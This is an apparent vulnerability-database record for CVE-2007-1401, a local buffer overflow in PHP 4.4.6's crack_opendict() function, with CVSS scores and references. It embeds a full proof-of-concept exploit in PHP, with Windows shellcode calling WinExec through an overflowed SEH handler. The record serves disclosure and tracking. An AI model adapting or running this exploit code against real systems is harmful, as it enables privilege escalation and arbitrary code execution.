ID OSVDB:35043
Type osvdb
Reporter OSVDB
Modified 2007-03-08T22:10:25
Description
No description provided by the source
References:
Vendor URL: http://www.php.net/
Other Advisory URL: http://retrogod.altervista.org/php_446_crack_opendict_local_bof.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0043.html
Generic Exploit URL: http://www.milw0rm.com/exploits/3431
CVE-2007-1401
{"bulletinFamily": "software", "viewCount": 3, "reporter": "OSVDB", "references": [], "description": "# No description provided by the source\n\n## References:\nVendor URL: http://www.php.net/\nOther Advisory URL: http://retrogod.altervista.org/php_446_crack_opendict_local_bof.html\nMail List Post: http://archives.neohapsis.com/archives/bugtraq/2007-03/0043.html\nGeneric Exploit URL: http://www.milw0rm.com/exploits/3431\n[CVE-2007-1401](https://vulners.com/cve/CVE-2007-1401)\n", "affectedSoftware": [], "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "7df8a3ecf52a0d7e2f2ddcf4fad22ee4"}, {"key": "cvss", "hash": "e8bafdc9ad5c6f47fe1e6e5fd509b7a9"}, {"key": "description", "hash": "8560ffba1df02e17dcc8fb300556ee42"}, {"key": "href", "hash": "fc853048755b400157fe13036b193e8c"}, {"key": "modified", "hash": "a9ba1cf72b29a34fbc99a38da10795a4"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "a9ba1cf72b29a34fbc99a38da10795a4"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "22d59c078c1d177ee09ee90c29f92aed"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "href": "https://vulners.com/osvdb/OSVDB:35043", "modified": "2007-03-08T22:10:25", "objectVersion": "1.2", "enchantments": {"score": {"value": 7.0, "vector": "NONE", "modified": "2017-04-28T13:20:31"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-1401"]}, {"type": "exploitdb", "idList": ["EDB-ID:3431"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7364"]}], "modified": "2017-04-28T13:20:31"}, "vulnersScore": 7.0}, "id": "OSVDB:35043", "title": "PHP Cracklib crack_opendict() Function Local Overflow", "hash": "0092cb0e77be3c593988fa71f28ce32988e71ddd2d0fb02212c9310b6086e2a6", "edition": 1, "published": "2007-03-08T22:10:25", "type": "osvdb", "history": [], "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvelist": ["CVE-2007-1401"], "lastseen": "2017-04-28T13:20:31"}
{"cve": [{"lastseen": "2019-05-29T18:08:58", "bulletinFamily": "NVD", "description": "Buffer overflow in the crack extension (CrackLib), as bundled with PHP 4.4.6 and other versions before 5.0.0, might allow local users to gain privileges via a long argument to the crack_opendict function.", "modified": "2018-10-16T16:38:00", "id": "CVE-2007-1401", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-1401", "published": "2007-03-10T22:19:00", "title": "CVE-2007-1401", "type": "cve", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "Buffer overflow on oversized function argument.", "modified": "2007-03-09T00:00:00", "published": "2007-03-09T00:00:00", "id": "SECURITYVULNS:VULN:7364", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7364", "title": "PHP crack_opendict() extension buffer overflow", "type": "securityvulns", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-01-31T18:28:24", "bulletinFamily": "exploit", "description": "PHP 4.4.6 crack_opendict() Local Buffer Overflow Exploit PoC. CVE-2007-1401. Local exploit for windows platform", "modified": "2007-03-08T00:00:00", "published": "2007-03-08T00:00:00", "id": "EDB-ID:3431", "href": "https://www.exploit-db.com/exploits/3431/", "type": "exploitdb", "title": "PHP 4.4.6 crack_opendict Local Buffer Overflow Exploit PoC", "sourceData": "<?php\n//PHP 4.4.6 crack_opendict() local buffer overflow poc exploit\n//win2k sp3 version / seh overwrite method\n//to be launched from the cli\n\n// by rgod\n// site: http://retrogod.altervista.org\n\nif (!extension_loaded(\"crack\")){\ndie(\"you need the crack extension loaded.\");\n}\n\n$____scode=\n\"\\xeb\\x1b\".\n\"\\x5b\".\n\"\\x31\\xc0\".\n\"\\x50\".\n\"\\x31\\xc0\".\n\"\\x88\\x43\\x59\".\n\"\\x53\".\n\"\\xbb\\xca\\x73\\xe9\\x77\". //WinExec\n\"\\xff\\xd3\".\n\"\\x31\\xc0\".\n\"\\x50\".\n\"\\xbb\\x5c\\xcf\\xe9\\x77\". //ExitProcess\n\"\\xff\\xd3\".\n\"\\xe8\\xe0\\xff\\xff\\xff\".\n\"\\x63\\x6d\\x64\".\n\"\\x2e\".\n\"\\x65\".\n\"\\x78\\x65\".\n\"\\x20\\x2f\".\n\"\\x63\\x20\".\n\"start notepad & \";\n\n$jmp=\"\\xeb\\x06\\x06\\xeb\"; // jmp short\n$eip=\"\\x86\\xa0\\xf8\\x77\"; // call ebx, ntdll.dll\n$____suntzu.=str_repeat(\"A\",3216);\n$____suntzu.=$jmp.$eip.str_repeat(\"\\x90\",12).$____scode;\ncrack_opendict($____suntzu);\n\n?>\n\n# milw0rm.com [2007-03-08]\n", "cvss": {"score": 6.9, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/3431/"}]}